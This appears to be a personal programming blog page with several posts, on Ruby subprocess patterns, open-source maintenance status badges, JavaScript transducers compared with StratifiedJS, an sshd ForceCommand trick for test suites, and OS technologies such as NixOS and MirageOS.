If ls fails (perhaps directory doesn’t exist), what happens? It looks like you’ll get an error, but it turns out that you might get an error or return an empty string, depending on the result of some previous, unrelated command. This is because $? does not get set by IO.popen until you close it. i.e. you would need to do:

io = IO.popen(['ls', directory])
listing = io.read
io.close
raise "it failed!" unless $?.exitstatus == 0
return listing

Which is a subtle difference, and not exactly pretty code. If you pass a block to IO.popen you won’t have this issue because it’ll call close for you, but you’ll need to remember that subtlety.

So although using $? can be done correctly, it’s ugly and it introduces the possibility of sneaky bugs. I’d rather avoid it.

What are we left with? Just Open3. This is the only option which:

accepts an array of arguments, and
explicitly returns a status object, rather than using $?

One exception is when you just want to run a command, and don’t need to capture its output. For this you can use the humble Kernel.system(), which takes an array and returns a boolean. So you’d use it like this:

system(['rm', '-r', directory]) or raise "Failed to remove #{directory}"

tl;dr: Common Ruby subprocess patterns

a.k.a enough talk, just tell me what to use!

1: You want to run something, but don’t need its output

system('rm', '-r', directory) or raise "Failed to remove #{directory}"

Protip: if you want to run a command without arguments, you should actually use:

system(["ls", "ls"])

…because otherwise system will take your single string to be a shell string.

2: You want to capture stdout as a string (and inherit `stderr`):

This is the most common case, in my experience.

stdout, status = Open3.capture2('unzip', '-l', zipfile)
raise <error> unless status.success?

(you can also pass a stdin_data: <string> option if you need to provide some input)

3: You want to capture stdout as a stream:

… because it might be huge, or you want to process each line as it arrives. This allows you to write to stdin as a stream, too.

Open3.popen2('unzip', '-l', zipfile) do |stdin, stdout, status_thread|
	stdout.each_line do |line|
		puts "LINE: #{line}"
	end
	raise "Unzip failed" unless status_thread.value.success?
end

4: You need to inherit `stdin`

This is a tricky edge case to figure out from the open3 docs. Each of the functions in that module support the same options as Open3#popen3. Which says that its options are passed through to Process#spawn. Which has lots of options for controlling redirections and file descriptors. Unfortunately, the docs don’t mention one crucial point - whatever redirections you pass will be ignored, because popen3 always overrides the redirection options with its own pipes.

So if you do need to inherit stdin and Kernel#system won’t do, IO.popen may be your only choice. e.g. to inherit stdin and read stdout as a string:

# I don't know why you're piping a zip file into `stdin`,
# but I'm not the judging type...
output = IO.popen(['unzip', '-l', '-'], in: :in) do |io|
	io.read
end
raise "unzip failed" unless $?.success?
puts output

Bonus round: avoiding deadlocks

There’s one more gotcha when it comes to dealing with subprocesses: deadlocks. This can be an issue when you want to process both stdout and stderr of a child. If one of these pipes fill up their OS buffer with unconsumed output, the OS will block the process until somebody reads that buffered data. But if your parent process is busy waiting for the other stream, you’ll get a deadlock. If you do decide to handle both streams yourself, you’ll need to use threads or select to read from whichever stream has data. But generally the best advice is to just to:

inherit stderr or redirect it to a file
combine stderr and stdout via Open3.popen2e or something similar

Epilogue, or “the stdlib sucks, let’s use gems”!

The stdlib does contain everything you need, but it also provides plenty of options to avoid - you need to know what you want and which modules can provide that. If you’re just doing this in one or two places, that’s probably fine.

But if you do enough of this that you’re happy to venture outside the standard library, there are some nice looking libraries which may provide a more consistent solution. In particular stripe’s subprocess library is promising - I haven’t tried it myself, but it’s a direct port of python’s subprocess module, which is one of the best modules I know of for doing this sort of thing. And stripe gets bonus points for explicitly disallowing sh syntax - you must provide an array of arguments.

Software Maintenance and Author Intent

2016-04-17T00:00:00+10:00

or, “I’ve written a lot of software, and now I have regrets”

As time goes on, people write more software. Well, at least I do. And these days, it’s pretty easy to put up everything you’ve created on GitHub or somewhere similar.

But of course, not all software is created equal. That 100-line JS library I created in one day back in 2011 which has seen 3 commits since is probably not going to be as important to me as the primary build tool I use in my own projects, which has implementations in 2 languages, an extensive automated test suite, and which has steadily seen improvements and fixes over the past 2 years with more than 300 commits.

And people usually realise this. Based on project activity, date of recent commits, total number of commits, amount of documentation etc, you can often get a good idea of how healthy a project is. But is that enough?

I’ve had people report bugs in a project where my immediate thought has been “well, this is pretty old and I haven’t used it for years - I’m not surprised it doesn’t work”. Meanwhile I see comments about another project where someone will wonder whether it still works, since it hasn’t been updated in ages. To which my first thought is “of course it still works! It doesn’t need updating because nothing’s wrong with it”.

I’ll try and communicate this less bluntly, but clearly there’s information I (as the author) know that other’s can’t without asking me - from what others can see, the projects probably look just as healthy as each other.

Why are you publishing it if you don’t care about it?

I don’t want to maintain all the software I’ve ever written. I’ve written plenty of software for platforms or tools I no longer use. I’ve written software to scratch an itch I no longer have, or which I just can’t be bothered keeping up to date with breaking API changes.

I could just abruptly delete each project as I decide it’s not worth maintaining, but that’s both drastic and rude. Maybe it works fine, but I no longer use it. Maybe others still depend on it. Maybe someone else would like to step up and take it over, rather than see it die. Maybe it doesn’t work as-is, but people can learn from reading parts of the code that are still useful. I publish Open Source software because it might be useful to others - deleting it when I no longer have a use for it doesn’t fit with that spirit at all.

Stillmaintained

A while ago, there was this project called “stillmaintained”. It aimed to address the issue of communicating project health directly, by answering the simple question “Is this still maintained?”. Ironically (but perhaps inevitably), stillmaintained itself is no longer maintained, and even the domain registration has lapsed. But I think the problem is an important one.

My solution

I think the constraints are:

It must be dirt easy for the author to manage. If it takes too much effort to update a project’s status, I’ll be too lazy to do it.
The infrastructure itself must be super low maintenance. I don’t want to spend all my time maintaining the thing that tells you if my projects are maintainted!

So to solve the issue for my projects, I did the simplest dumbest thing:

I created a few static images with Inkscape.
In a folder that gets synced to this website, I made a bunch of files named <projectname>.png, each of which is a symlink to a status (e.g. ../maintained.png, ../abandoned.png, etc).
I embed that <projectname>.png into the project’s README, documentation, etc.
When I decide that a project’s status has changed, I modify the appropriate symlink.

Now the status for all my projects is managed in one directory, and I can generate a list of active projects with a simple python script. I don’t need to go and edit that project’s README, docs and packaging metadata - it all just points to the same place.

Here’s an example badge, for abandoned projects:

It’s not fancy. There are no RSS feeds or email notifications when the project status changes. Showing an image containing text is not very accessible, nor very flexible. But it’s the easiest way for me to tell visitors to my projects what my assessment of that project’s health is, which is something I’ve never had the ability to do very well before. And since it’s so low maintenance, I’m hopeful that I’ll actually keep these up to date in the future.

In open source software, the author is under no obligation to maintain or fix anything - it’s there, take it or leave it. That doesn’t tell the full story. I want people to use my code, so just ignoring users and possible contributors because I have no obligation to them is a great way to get a reputation as a terrible project maintainer. At the same time, there’s no way I can fully maintain all the software I’ve ever written, especially as time goes on and that set gets larger. So the best I can do is to try and honestly communicate my intent as part of each project’s public documentation.

Midori Blog: The Error Model

2016-02-19T00:00:00+11:00

For the past few months, Joe Duffy has been blogging about the most interesting aspects of the design and implementation of Midori, a now-abandoned research OS from Microsoft Research, which has been incredibly interesting to follow. I particularly enjoyed the latest article about the error model, but the whole series is worth a read (and a subscribe, since there are more on the way).

(view link)

Low-Poly Wren

2016-02-06T00:00:00+11:00

Well, it’s been a little while (something like 10 years) since I’ve done any 3d rendering. After seeing a bunch of inspirational things recently (particularly caminandes 3 and browsing Fi Silva’s work), I thought I’d crack open Blender and have a go at some low-poly artwork.

Of course, I pretty much had to make a blue wren:

(click for huge wallpaper size)

In terms of picking up Blender after not touching 3D software for a decade, it was actually not too painful. Initially it was frustrating to know what I wanted to do but not remember how to achieve it, but there’s plenty of starter resources out there and after a few hours I was feeling relatively comfortable with the basics. An my faded muscle memory probably worked in my favour, because last time I used Blender I had strong 3DS Max knowledge, making Blender feel weird and alien. But coming at it (relatively) fresh, it’s actually quite easy to get used to, and such an amazing piece of software.

I’m particularly amazed in how straightforward certain highly complex things have become - e.g. the builtin cycles renderer does an excellent (and fast!) job of Global Illumination - I remember pining over Arnold and other specialized renderers while scripting complex dome-light rigs to emulate GI with the standard 3DS Max renderer.

Also physics: just for fun I’ve already made a bunch of “solid object turns into liquid and splats on the ground” animated gifs because it takes literally minutes to set this up and run the simulations in Blender. Last time I tried physics I don’t think I even had access to a liquid sim, the most exciting thing I could do was drape a square cloth over a sphere.

Of course, none of that makes animation or modeling any easier, as those are not something the computer can really help much with. But it’s really encouraging to be able to light a scene and have a pretty result in next to no time, especially as lighting is really not my strong suit. And if I ever need a wren to suddenly dissolve into liquid, I’m all set for that too!

Running gnome-shell nested in a Xephyr window

2016-02-01T00:00:00+11:00

TL;DR: install nix and Xephyr, then try this script.

I’ve worked on a GNOME Shell tiling window extension (shellshape) for 5 years now, since before the first release of gnome-shell. The shell itself is impressively extensible, and it’s pretty amazing that I can distribute a tiling window extension which as just a bunch of javascript. But the development process itself has always been awful:

you have to restart your window manager all the time, which typically loses the sizing and workspace affinity of every window, leaving you with a tangled mess of windows
if your extension doesn’t work then you have a broken shell
it is painfully easy to cause a segfault (from JavaScript code :( )
you’d better be editing your code in a tmux session so you can fix it from a VTE
sometimes when restarting the shell, all your DBus-based integrations get messed up so you can’t change volume, use multimedia keys or shutdown
testing against a new gnome-shell version basically means either upgrading your OS or trying to do a fresh install in a VM, which is a whole new layer of annoyance.

Maybe I’m spoiled from working on projects which are easily run in isolation - I bet kernel developers scoff at the above minor inconveniences. But it makes development annoying enough that I dread it, which means I’ll only fix bugs when they get more annoying than development itself.

All of which is to say that this is freakin’ awesome. As of a couple days ago I’ve been able to run the latest version of GNOME Shell (which isn’t packaged for my distro) in a regular window, completely disconnected from my real session, running the development version of shellshape.

Big thanks go to whichever mysterious developers were responsible for fixing whatever gnome-shell / graphics / Xephyr issues have always prevented gnome-shell from running nested (it does now!), and to the nixpkgs folks maintaining the latest GNOME releases so that I can run new versions of GNOME without affecting the rest of my system.

Unfortunately I can’t guarantee it’ll work for you, since this stuff is heavily dependant on your graphics card and drivers, plus it only seems to work with my system version of Xephyr, not the nixpkgs one. But if this interests you, you should definitely give it a go. You’ll need nix and Xephyr. If you don’t want to use nix, you can probably extract what you need from the script to run your system version of gnome-shell in a Xephyr window.

Heads up: new handle

2015-11-28T00:00:00+11:00

Just a quick heads up, in case anyone comes here looking for verification: I’ve changed my twitter & github handle from @gfxmonk to @timbertson.

I don’t have particular plans to rename this site, since that’s a lot more complex and it would break All The Links. But “gfxmonk” was a name I picked when I was big into computer graphics (and not a monk, though it sounded cool at the time). A decade or so later I’m more of an enthusiastic observer when it comes to graphics, and still not all that monk-like. So I figured I’d adopt a handle that was based on my name, since I probably won’t decide to change that any time soon.

Figuring out what transducers are good for (by trying to use them for a bunch of problems in JavaScript)

2015-11-25T00:00:00+11:00

I’ve been aware of transducers for a little while, but haven’t actually used them, or even really felt like I fully grokked what they were good for. They come from the clojure community, but are making their way into plenty of other languages and libraries too. I’ve seen claims that they are a game-changing, breathtaking new concept, which didn’t really square with what they looked like.

So I thought I’d learn more about them by just attempting some plausible but detailed examples with them in JavaScript. If you’ve heard about transducers but aren’t really sure what they’re good for, perhaps this’ll help clarify. And if you’ve never heard of transducers, feel free to take a detour via the clojure documentation.

tl;dr
- So what are transducers?
Let’s transduce some things!
Closing thoughts
Appendix a: More examples
- “Mapping” the values of an object
- Custom iterators

tl;dr

After trying out transducers on a bunch of sample problems, my takeaway is that transducers are:

a neat encapsulation for the usual set of functional transformations (map, filter, reduce, etc)
a common way to represent a transformation to be done later, which leads to:
a way to apply multiple transformations without creating intermediate collections
a decent way to compose asynchronous transformations (compared to vanilla JavaScript efforts)
significantly more complex to understand than map, filter, reduce, etc.

These features are neat, but I wouldn’t call them ground-breaking. And I may be spoiled, but “the ability to use the same transformations on collections of different types (arrays, streams, etc)” isn’t terribly novel - Javascript is one of the worst high-level languages for dealing with things like lazy or blocking computation. Most other languages can already achieve the majority of these goals using some sort of lazy iterator / collection protocol and plain ol’ map, filter, and reduce.

To expand on the last point above about complexity - sometimes this won’t matter. If you just use t.map and friends, you can largely ignore the complexity as an implementation detail. But if you get into more complex transducers, you may well be baffled by their failure to do what you expect, and figuring out why can be difficult. This happened to me plenty of times when coming up with these examples, and they aren’t even that complex.

So what are transducers?

From what I’d read they seemed mostly like a way of representing map, filter and reduce style operations as an object which can be applied later. They do this by encapsulating three functions - init, step and result. To make matters harder to wrap your head around, transducers don’t directly do things to a collection - they wrap another transducer. Rather than go into the theory and implementation of individual transducers, I’m going to focus on how they’re used, and by extension when they are useful.

Here’s an example of a map transducer, which can be used to build a copy of a sequence with each element incremented by 1.

var addOneToEverything = transduce.map(function(x) { return x + 1; });
var result = t.into([], addOneToEverything, someSequence);

But that’s not a very useful example, because it doesn’t gain you anything. After all, it’s trivial to store and reuse a mapping function already:

var addOne = function(x) { return x + 1 };
var result = someSequence.map(addOne);

If you really don’t want to remember that addOne should be applied with map (and not to filter or reduce), you could always wrap it further:

var addOneToEverything = function(seq) {
  return seq.map(function(x) { return x + 1 });
}
var result = addOneToEverything(someSequence);

Another stated strength of transducers is that they compose easily - you can build a chained transducer with:

var chain = transduce.compose(addOneToEverything, filterOutEvenNumbers);

..but I can compose functions, too:

var result = filterOutEvenNumbers(addOneToEverything(items));

There are definite downsides to this approach:

it builds intermediate arrays - if you apply multiple transformations you’ll be building an intermediate array for each one
it only works for synchronous transformations - you need an entirely different API to deal with async map functions

I’ve also heard that a big benefit of transducers is that they don’t have to know what kind of sequence you’re dealing with. I don’t really buy that, since this is all just duck typing - whatever sequence type you have, as long as it has a map function, you’re set. Whether it’s an object, or an array, or some custom iterator type, addOneToEverything doesn’t know or care.

The interesting thing is that the above downsides are really just limitations of the JavaScript language. I don’t know enough about clojure to know whether they are big issues there, but I do know plenty about StratifiedJS (I helped build it!) to know that it has neither of those problems.

Specifically, in StratifiedJS any expression can “suspend”, and the runtime will not evaluate something depending on that expression until its value is “ready”. It’s as if the language were smart enough to evaluate every single Promise expression automatically, so that instead of a promise you just see the eventual result. This isn’t exactly how it’s implemented, but conceptually it’s quit similar. And rather than managing concurrency using event-based callbacks, StratifiedJS introduces explicit concurrency syntax which provides structured (lexical) concurrency, rather than a tangle of events and callbacks which are hard to understand and reason about.

Let’s transduce some things!

So, let’s try and do a bunch of semi-complex things with transducers in JavaScript, and see how they compare to StratifiedJS, a superset of JavaScript with rich concurrency support.

For the examples below, I’m using the following libraries:

Not being up to scratch with the latest npm hotness, I wasn’t really sure which libraries to go with - there are seemingly endless variations on the name “transducers”, and more promise implementations than you can poke a stick at. But these are what I used, particularly because transduce has builtin support for async transducers, which doesn’t seem to be the case with some other libraries.

If you want to run an example, you can throw it in a .js file after the following prelude:

#!/usr/bin/env node
var t = require('transduce');
var Promise = require('es6-promise').Promise;
var TransduceStream = require('transduce-stream');
var ObjectStream = require('object-stream');
var EventEmitter = require('events').EventEmitter;

If you want to run the StratifiedJS examples, you just need to add this to the top: (you’ll obviously need StratifiedJS installed, too)

#!/usr/bin/env sjs
@ = require('sjs:std');

Example 1: nested map / filter / groupBy

To pick a random sequence processing task, lets try to:

1) group sequential elements in a stream based on whether they’re even or odd 2) sum up each group 3) report only the sums which are divisible by 3

It’s a bit arbitrary, but it includes a bunch of transformations which need to be chained. Here’s how I’d do it in StratifiedJS:

var items = [1, 2, 4, 12, 8, 3, 13, 5, 6, 7];
var sum = items -> items .. @reduce(0, (a,b) -> a + b);
items = items .. @groupBy(x -> x%2)
  .. @transform(([key, items]) -> items) // ignore the `key`
  .. @transform(sum)
  .. @filter(x -> x%3 === 0)
  .. @toArray();
console.log(items);

// => [ 21, 6 ]

Aside: StratifiedJS primer

I don’t expect you to be familiar with StratifiedJS for these examples, but the intent is that (glossing over syntactic details) they should be fairly readable. StratifiedJS is a superset of JavaScript - most of the syntax is just JavaScript. But here’s a primer on the StratifiedJS-only features I’m be using:

@foo by convention denotes a standard library function called foo.
transform is a lazy version of map - i.e. it produces a lazy stream rather than an array.
someFunc() ... anotherfunc() is like a pipeline. You don’t really need to know the details, other than it’s just function application which reads from left-to-right. It’s a lot like how composition works in a unix pipeline (cat foo | grep bar | wc -l).
a -> b is a lambda function, equivalent to function(a) { return b; }

So hopefully the above example is pretty straightforward - we’ve chained / composed transform, groupBy, filter using simple function application. Since we’re using transform (a lazy version of map), the transformations will be applied only as necessary - we won’t build up an array for each intermediate step.

Here’s what the equivalent code looks like with transducers:

var items = [1, 2, 4, 12, 8, 3, 13, 5, 6, 7];
var sum = {
  "@@transducer/init": function() { 
    return 0;
  },
  "@@transducer/result": function(result) { 
    return result;
  },
  "@@transducer/step": function(result, input) {
    return result + input;
  }
};

var transducer = t.compose(
  t.partitionBy(function(x) { return x%2; }),
  t.map(function(items) { return t.reduce(sum, items); }),
  t.filter(function(x) { return x%3 === 0; })
);
items = t.into([], transducer, items);
console.log(items);

// => [ 21, 6 ]

Not too bad, transducers. The glaring weirdness is that I had to implement sum myself as a (very boring) raw transformation object. I really expected that I’d be able to build a transducer from the kind of function you’d pass to reduce(), but I couldn’t figure out how. I’ll update this if someone enlightens me. But in terms of actually composing the transducers, it reads just like my StratifiedJS pipeline. And unlike a regular JavaScript pipeline, it won’t construct intermediate arrays either.

Also note that sum is not a transducer - it’s a transformation. A transformation is like the “base” form of a transducer, while a transducer is actually a function which takes a transformation and returns a new transformation. This wasn’t explained terribly well in the documentation, and it feels a little odd since transducers are what all the fuss is about, while transformations are clearly important too.

Example 2: … but what about async?

It’s not a proper JavaScript example without an asynchronous spanner thrown in the works. The transduce npm module I chose has support for async transformations, so how do you use it?

var items = [1,2,3];
var plusOne = t.map(function(x) { return x + 1 });
var plusOneSlowly = t.map(function(item) {
  return new Promise(function(resolve, reject) {
    setTimeout(function() {
      resolve(item + 1);
    }, 100);
  });
});
var transducer = t.compose(plusOneSlowly, t.async.defer(), plusOne);
t.async.into([], transducer, items).then(function(items) {
  console.log(items);
});

// => [ 3, 4, 5 ]

OK, so that was actually pretty decent. We were able to combine a sync (plusOne) and an async (plusOneSlowly) transucer in the same pipeline. The changes were just:

use t.async.into (which returns a promise) instead of t.into
insert a t.defer() after each asynchronous transducer in the arguments to compose

The latter was a little confusing - originally I assumed I needed to wrap each async transducer, as in t.defer(addOneToEverything). But when I did that, my transformation was completely ignored. So that was pretty alarming. It’s my fault for not reading the docs clearly enough, but it seems a bit counterintuitive. Now that I know how transducers work it actually makes a little more sense, because defer is nothing special - it’s just a transducer which resolves promises into their values. But it threw me off for a while.

For comparison, here’s how it would look in StratifiedJS:

var items = [1,2,3];
console.log(items
  .. @transform(x -> x + 1)
  .. @transform(function(x) {
      hold(100); // builtin function which suspends for `n` milliseconds
      return x + 1;
    })
  .. @toArray());

// => [ 3, 4, 5 ]

StratifiedJS has no real need for promises - any expression can “suspend” and you get the benefits of sequential semantics combined with the performance of async code. So this was always going to knock JavaScript out of the park, which goes to show that sometimes a critical feature in one language might not be all that useful elsewhere.

Example 3: lazily reading lines from a file

This one is probably the most complex, but it’s a practical, real-world application.

One thing I’ve noticed with nodejs streams is that doing anything truly custom is a massive pain - you basically have to implement a DuplexStream and deal with all the intricacies of the Stream interface yourself. As an example, here’s the 100+ lines implementation of byline, which implements the process I’m about to describe. So it’s a very low bar that transducers will need to beat here ;)

The main complexity here is that we read streams in “chunks”, and emit “lines” - each chunk may contain any number of lines, and we need state to track the part of the most recent line we’ve seen. So each time we see a chunk from the source, we’ll have zero or more lines to emit.

Here’s how I do it in StratifiedJS:

// Fake `chunks` stream - we use the same `Stream` interface for
// real nodeJS streams, so this isn't cheating.
var fileChunks = @Stream(function(emit) {
  var chunks = [
    'I am the first',
    ' line\n..and I am the second\n ...',
    ' third!'
  ];
  chunks .. @each {|chunk|
    hold(100);
    emit(chunk);
  };
});

// This accepts a "chunk" stream and returns a "line" stream.
// Both streams are lazy - the next chunk won't be read until it's required
var linesOfStream = function(stream) {
  return @Stream(function(emit) {
    // buffer any partial contents of the current line
    var current = '';
    // iterate over chunks
    stream .. @each {|chunk|
      current += chunk;
      var lines = current.split('\n');
      current = lines.pop();
      // when we have any full lines, emit them
      lines .. @each(emit);
    }
    // emit the last line, if any
    if(current != '') emit(current);
  });
};

// Collect the (lazy) stream into an array and just log it
console.log(fileChunks
  .. linesOfStream
  .. @transform(x -> x + "!")
  .. @toArray());

// => [ 'I am the first line!', '..and I am the second!', ' ... third!!' ]

..and here’s how you can do it with a JavaScript transducer:

var chunks = [
  'I am the first',
  ' line\n..and I am the second\n ...',
  ' third!'
];

// make a nodejs stream with artificial delay between each chunk)
var fileChunks = ObjectStream.fromArray(chunks).pipe(
  ObjectStream.map(function(item, done) {
    setTimeout(function() { done(null, item); }, 10);
  })
);

// The `Lines` transducer accepts chunks from the source, and
// emits lines into the downstream transducer:
var Lines = function(xf) {
  var current = '';
  return {
    "@@transducer/init": function() { 
      return xf["@@transducer/init"](); 
    },
    "@@transducer/result": function(result) { 
      result = xf["@@transducer/step"](result, current); 
      if (t.isReduced(result)) {
        return t.unreduced(result);
      }
      return xf["@@transducer/result"](result); 
    },
    "@@transducer/step": function(result, input) {
      input = input.toString('utf-8');
      current += input;
      var lines = current.split('\n');
      current = lines.pop();
      lines.forEach(function(line) {
        result = xf["@@transducer/step"](result, line); 
        if (t.isReduced(result)) {
          return t.unreduced(result);
        }
      });
      return result;
    }
  };
};

var transducer = t.compose(Lines, t.map(function(x) { return x + '!'; }));
var lineStream = fileChunks.pipe(TransduceStream(transducer));

lineStream.on('data', function(d) {
  console.log('Line:', d.toString('utf-8'));
})
lineStream.on('end', function() {
  console.log('Done');
});

// =>
// Line: I am the first line!
// Line: ..and I am the second!
// Line:  ... third!!
// Done

So that’s quite a bit longer, but it’s actually not too bad, considering the alternative (implementing this directly as a NodeJS stream transformation). Plus, you could use the same transducer on arrays / event emitters which for some reason spit out chunks instead of lines.

One thing that complicates this is that we have to take care to handle “early return” values, which are named “reduced” values. I’m not sold on the name (perhaps “terminator” would be better), but it forces us to check for them in various places since our transducer doesn’t just have a one-to-one (or one-to-zero) mapping between input and output items.

Also, I couldn’t find a good way to tell the stream machinery to leave my strings alone - I kept receiving them (in both the step function and the output data items) as Buffer objects. Maybe I missed it in the API, or maybe it just needs to be added. It’s not a big deal, but it feels hacky and unnecessary.

I originally thought this was one transformation that couldn’t be expressed as a simple reduce in StratifiedJS, because you need to keep track of two accumulators - the lines so far, as well as the current (partial) line buffer, But I realised you actually can, if you simply treat the “last line” as the buffer. This does mean you can’t omit the blank line at the end if your file ends with a newline. It also feels a little hacky to mutate the result during each step, but it is pleasantly concise:

var lines = fileChunks .. @reduce([''], function(lines, chunk) {
  var current = lines.pop();
  current += chunk;
  current.split('\n') .. @each(lines.push);
  return current;
});

Example 4: event streams

The last thing I thought I’d try was an event stream, because those can also be useful to process as a sequence (but unlike streams, you can’t tell your emitter to slow down - you just have to deal with events as they happen).

var transducer = t.compose(
  t.map(function(x) { return x+1; }),
  t.async.delay(1000),
  t.async.defer(),
  t.take(5)
);
var source = new EventEmitter();
var receiver = new EventEmitter();

var result = t.async.emitInto(receiver, transducer, source);

// kick off an infinite set of `source` events
var timeout;
var spawn = function() {
  var count = 0;
  return function() {
    timeout = setTimeout(function() {
      timeout = null;
      source.emit('data', count++);
      spawn();
    }, 500);
  };
}();
spawn();

receiver.on('data', function(data) {
  console.log("Data:", data);
});

receiver.on('end', function() {
  console.log("Done");
  if(timeout != null) clearTimeout(timeout);
});

// =>
// Data: 1
// Data: 2
// Data: 3
// Data: 4
// Data: 5
// ( ... program never terminates)

This one is a complete failure.

Note that I explicitly added code to deal with shutting down the emitter, which the documentation implied I would see after the take(5) had caused the transducer to finish prematurely. But it never stopped, nor was the underlying listener removed from source - if I insert a console.log you can see that the map step still gets called forever with new values, but its results just get ignored. And given that I never actually see an end event, it’s actually impossible to see when my transducer has “finished”. If anyone knows how to do this right, I’d be interested to know it.

Extra credit: streams & async processing

Even though streams are inherently asynchronous, I could find no way to properly apply an asynchronous transducer to my Lines stream. I tried, with:

var transducer = t.compose(Lines, t.async.delay(1000), t.async.defer());

… but as soon as the lines were all done being emitted, the output stream saw end() - any promises which had not resolved were simply dropped. That’s very bad, especially since whether or not it “works” is based on the speed of your input stream, so it could appear to work 95% of the time but silently do the wrong thing when your system is under load.

I don’t count this (or the previous example) as an inherent ding against transducers, though - it seems like this is probably just a bug in the transduce-stream library.

Closing thoughts

If you haven’t read the tl;dr above, that summarises my thoughts pretty well. But it’s worth reiterating that using transducers in JavaScript is failure-prone and hard to figure out¹.

It’s really easy to abort your program with no indication of why - accidentally returning undefined from a function can short-circuit something, and instead of an error your program just halts prematurely. Not really a problem with transducers, but something to be aware of when using them in JavaScript. This is pretty much an occupational hazard with JavaScript though - a stray callback can silently ruin everything. I think I’ve been spoiled by using StratifiedJS for so long ;)
Also (probably the cause of some of the above), unhandled exceptions in my code would not get printed, the process would just exit silently. This is a terrible developer experience, but I don’t actually know which library is to blame. This is also just something that happens when you’re programming in JavaScript, sadly.

Appendix a: More examples

Feeling like I now grokked transducers, I figured I’d explore some more of their particular features. A lot of fuss is made of their ability to apply transformations to all sorts of collections, not just arrays. So let’s see how that looks, shall we?

“Mapping” the values of an object

var mapVal = function(fn) {
  return t.map(function(pair) {
    return [pair[0], fn(pair[1])];
  });
}

var src = {
  key1: 'val1',
  key2: 'val2',
  key3: 'val3',
};
var transducer = mapVal(function(x) {
  return x + '!';
});
var result = t.into({existing: 1}, transducer, src);
console.log(result);

// => { existing: 1, key1: 'val1!', key2: 'val2!', key3: 'val3!' }

I can’t really think of any situation where I’d need to transduce “into” a non-empty destination, but it is nevertheless quite neat.

Custom iterators

// custom "infinite sequence from <n>" implementation
function Count(initial) {
  var rv = {};
  rv[t.protocols.iterator] = function() {
    return {
      _idx: initial,
      next: function() {
        var self = this;
        return {
          value: new Promise(function(resolve) {
            setTimeout(function() {
              resolve(self._idx++);
            }, 10);
          }),
        };
      },
    }
  };
  return rv;
}
var transducer = t.compose(
  t.map(function(x) { return x+1; }),
  t.async.delay(10),
  t.async.defer(),
  t.take(5)
);

t.async.into([], transducer, Count(10)).then(function(result) {
  console.log(result);
});

// => [ 11, 12, 13, 14, 15 ]

This is pretty neat - we take an infinite sequence starting from 10, add one to each element, and then just take the first five numbers of the result. Of course, this is also pretty trivial with StratifiedJS:

function Count(n) {
  return @Stream(function(emit) {
    while(true) {
      hold(10);
      emit(n++);
    }
  });
}
console.log(Count(10)
  .. @transform(x -> x + 1)
  .. @take(5)
  .. @toArray());

// => [ 11, 12, 13, 14, 15 ]

Fun fact:
null + 2 + 4 == 6, and
0 + 2 + 4 == 6, and
t.into(0, sum, [2, 4])) == 6, but
t.into(null, sum, [2, 4])) == 4
because apparently an initial value of null is a special signifier for “return the last value of the input sequence”, which didn’t seem to be documented anywhere. I’d never rely on sane behaviour from null + <number> in real code, but it had me scratching my head when I encountered it by accident. ↩

Force a specific shell for sshd

2015-04-24T00:00:00+10:00

I use fish-shell as my default shell on my own computer, because it’s a pretty nice shell.

Occasionally, though, this causes issues. Software tests in particular have a habit of sloppily running shell command. Typically, this can be fixed by just being more explicit, using execvp(['bash', '-c', '<command>']) (or just use execv* directly instead of going through a shell).

But one case I couldn’t figure out is SSH. When you’re testing an SSH client, the most reliable way to do that is to run some shell scripts over a local SSH session, and check that it does what you expect. SSH has no way of passing a nice array of arguments, all you get is a string which will be interpreted by the user’s SHELL.

If you want to use bash for an SSH command, many online resources will tell to you run “ssh bash ...". But that won't work for tests, which want to run _real_ commands against a POSIX shell (including edge cases around argument parsing). Other suggestions include changing your default shell, but I don't want to forsake my preferred shell just to appease some automated tests!

What you can do however, is funnel the whole shell string through to your desired shell using this slightly underhand sshd configuration:

ForceCommand sh -c 'eval "$SSH_ORIGINAL_COMMAND"'

This still requires a default shell that’s normal enough to not do any interpolation within single quotes, but that’s a much simpler requirement (and true of fish-shell).

For the Conductance test suite, we run an unprivileged SSHD daemon with its own checked-in config during testing. So applying this globally is fine. But if you are doing this on actual SSH server, you might want to use a Match directive to make sure this rule only applies to trusted user (e.g I haven’t tested how this works on a locked-down account with its shell set to /bin/nologin, it could conceivably create a security hole).

OS Technologies To Watch

2015-01-04T00:00:00+11:00

It’s the new year, and it seems to be a vibrant time for novel Operating System technologies. This is not intended to be an objective list of “the best things”, it’s just some up-and-coming technologies that I’m particularly excited about right now:

Nix / NixOS

I’ve known about nixos for a while, but not really had much cause to use it. This year, I started using nixos to deploy some cloud services. I have been completely blown away.

I had so much to say about NixOS that I turned it into its own post: NixOS and stateless deployment, so go read that if you’re interested. But to summarize, Nixos lets you define a computer’s complete OS and configuration, declaratively. Users. Files. Software (both official and your own). Configuration. Services. Disk mounts. Kernel drivers. Every friggin’ thing. It’s all specified in a pure, lazy, strongly typed declarative language with just enough power (functions, modules, etc) to allow all the abstractions you need, but which often reads just like a trivial configuration file.

And unlike puppet (which is declarative but impure and non-exhaustive), the promise of stateless declarative configuration actually holds true. Taking so much state out of deployment really is an incredible and liberating achievement. I honestly dread the next time I have cause to deploy something that isn’t NixOS.

But while NixOS is incredibly useful for development / deployment, it’s unlikely to be useful as a desktop OS. Eliminating state for a personal desktop machine is nowhere near as critical as it is for servers, and nix has a pretty poor desktop-specific package selection ~~(e.g still no Gnome3 packages)~~. Update (04/01/2015): Multiple people have pointed out that Gnome3 is packaged and works fine, so that was a bad example ;)).

MirageOS

MirageOS is not your standard OS. A mirage binary is basically your application code statically linked against an OS kernel, as one big blob, called a “unikernel”.

This sounds like a crazy idea, but think about it. Many VMs these days on cloud providers run just one service, for isolation and other reasons. So you have the linux kernel, with a full multi-user multi-tasking stack, a host of installed services and only one job (your app). That’s hundreds of megabytes of code, before you even factor in your own software. The amount of incidental complexity you could avoid by cutting all of that out and just linking your app directly against a massively simpler kernel is pretty astounding.

Of course, a massively simpler system like this has limitations. MirageOS only runs OCaml code. You can’t run multiple processes (but you can use a cooperative event-loop library like lwt to perform concurrent tasks in the one process). You don’t even necessarily have a disk (but you can set one up if you need persistent storage).

